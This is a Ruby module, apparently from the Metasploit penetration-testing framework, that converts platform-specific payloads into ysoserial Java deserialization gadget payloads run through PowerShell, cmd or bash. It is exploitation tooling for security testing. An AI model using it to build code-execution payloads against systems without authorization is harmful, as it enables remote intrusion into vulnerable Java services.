Spencer McIntyre
45 lines
1.4 KiB
Ruby
45 lines
1.4 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
module Msf
|
|
|
|
module Exploit::JavaDeserialization
|
|
|
|
include Msf::Exploit::Powershell
|
|
|
|
def generate_java_deserialization_for_command(name, shell, command)
|
|
# here we force usage of a modified type to avoid compatibility issues with command characters thar are present in
|
|
# some ysoserial payloads
|
|
unless %w{ bash cmd powershell }.include? shell
|
|
raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
|
|
end
|
|
|
|
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
|
|
end
|
|
|
|
def generate_java_deserialization_for_payload(name, payload)
|
|
command = nil
|
|
|
|
if payload.platform.platforms == [Msf::Module::Platform::Windows]
|
|
if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
|
|
command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
|
|
elsif payload.arch.first == Rex::Arch::ARCH_CMD
|
|
command = payload.encoded
|
|
end
|
|
modified_type = 'cmd'
|
|
else
|
|
if payload.arch.first == Rex::Arch::ARCH_CMD
|
|
command = payload.encoded
|
|
end
|
|
modified_type = 'bash'
|
|
end
|
|
|
|
if command.nil?
|
|
raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
|
|
end
|
|
|
|
Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: modified_type)
|
|
end
|
|
|
|
end
|
|
end
|